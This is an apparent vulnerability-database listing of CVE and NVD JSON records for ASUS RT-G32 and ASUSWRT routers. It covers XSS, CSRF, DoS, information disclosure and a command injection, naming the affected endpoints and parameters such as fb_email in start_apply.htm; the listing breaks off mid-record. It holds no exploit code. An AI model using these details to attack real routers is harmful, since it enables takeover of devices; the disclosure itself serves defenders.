Vulnerabilites related to asus - rt-g32
cve-2015-2681
Vulnerability from cvelistv5
Published
2015-03-23 16:00
Modified
2024-08-06 05:24
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T05:24:38.420Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://websecurity.com.ua/7644/"
          },
          {
            "name": "73296",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/73296"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-03-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-12-01T15:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://websecurity.com.ua/7644/"
        },
        {
          "name": "73296",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/73296"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-2681",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
            },
            {
              "name": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
            },
            {
              "name": "http://websecurity.com.ua/7644/",
              "refsource": "MISC",
              "url": "http://websecurity.com.ua/7644/"
            },
            {
              "name": "73296",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/73296"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-2681",
    "datePublished": "2015-03-23T16:00:00",
    "dateReserved": "2015-03-23T00:00:00",
    "dateUpdated": "2024-08-06T05:24:38.420Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2015-2676
Vulnerability from cvelistv5
Published
2015-03-23 16:00
Modified
2024-08-06 05:24
Severity ?
Summary
Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T05:24:37.947Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
          },
          {
            "name": "73294",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/73294"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://websecurity.com.ua/7644/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-03-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-30T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
        },
        {
          "name": "73294",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/73294"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://websecurity.com.ua/7644/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-2676",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20150307 Fw: Vulnerabilities in ASUS RT-G32",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
            },
            {
              "name": "73294",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/73294"
            },
            {
              "name": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
            },
            {
              "name": "http://websecurity.com.ua/7644/",
              "refsource": "MISC",
              "url": "http://websecurity.com.ua/7644/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-2676",
    "datePublished": "2015-03-23T16:00:00",
    "dateReserved": "2015-03-23T00:00:00",
    "dateUpdated": "2024-08-06T05:24:37.947Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-20333
Vulnerability from cvelistv5
Published
2020-03-20 00:11
Modified
2024-08-05 11:58
Severity ?
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router.
References
https://starlabs.sg/advisories/18-20333/x_refsource_MISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T11:58:19.040Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://starlabs.sg/advisories/18-20333/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-20T00:11:15",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://starlabs.sg/advisories/18-20333/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-20333",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://starlabs.sg/advisories/18-20333/",
              "refsource": "MISC",
              "url": "https://starlabs.sg/advisories/18-20333/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-20333",
    "datePublished": "2020-03-20T00:11:15",
    "dateReserved": "2018-12-21T00:00:00",
    "dateUpdated": "2024-08-05T11:58:19.040Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-20335
Vulnerability from cvelistv5
Published
2020-03-20 00:11
Modified
2024-08-05 11:58
Severity ?
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI.
References
https://starlabs.sg/advisories/18-20335/x_refsource_MISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T11:58:18.948Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://starlabs.sg/advisories/18-20335/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-20T00:11:08",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://starlabs.sg/advisories/18-20335/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-20335",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://starlabs.sg/advisories/18-20335/",
              "refsource": "MISC",
              "url": "https://starlabs.sg/advisories/18-20335/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-20335",
    "datePublished": "2020-03-20T00:11:09",
    "dateReserved": "2018-12-21T00:00:00",
    "dateUpdated": "2024-08-05T11:58:18.948Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-20334
Vulnerability from cvelistv5
Published
2020-03-20 00:11
Modified
2024-08-05 11:58
Severity ?
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell.
References
https://starlabs.sg/advisories/18-20334/x_refsource_MISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T11:58:18.926Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://starlabs.sg/advisories/18-20334/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-20T00:11:06",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://starlabs.sg/advisories/18-20334/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-20334",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://starlabs.sg/advisories/18-20334/",
              "refsource": "MISC",
              "url": "https://starlabs.sg/advisories/18-20334/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-20334",
    "datePublished": "2020-03-20T00:11:06",
    "dateReserved": "2018-12-21T00:00:00",
    "dateUpdated": "2024-08-05T11:58:18.926Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Vulnerability from fkie_nvd
Published
2015-03-23 16:59
Modified
2024-11-21 02:27
Severity ?
Summary
Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm.
Impacted products
Vendor Product Version
asus rt-g32_firmware 2.0.2.6
asus rt-g32_firmware 2.0.3.2
asus rt-g32 *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:asus:rt-g32_firmware:2.0.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "B21BBA8F-73CB-4C10-8D25-12BA8A8FD4CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:asus:rt-g32_firmware:2.0.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "28B35FF4-75BB-4AE6-B3A7-BB5ABB3AB5B3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:asus:rt-g32:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3363698A-B79E-4EC0-9D12-685DC86B35D9",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de CSRF en los routers ASUS RT-G32 con firmware 2.0.2.6 y 2.0.3.2 permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores por peticiones que cambian la contrase\u00f1a de administrador a trav\u00e9s de una petici\u00f3n a start_apply.htm."
    }
  ],
  "id": "CVE-2015-2676",
  "lastModified": "2024-11-21T02:27:49.793",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2015-03-23T16:59:03.617",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://websecurity.com.ua/7644/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/73294"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://websecurity.com.ua/7644/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/73294"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-03-20 01:15
Modified
2024-11-21 04:01
Severity ?
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29",
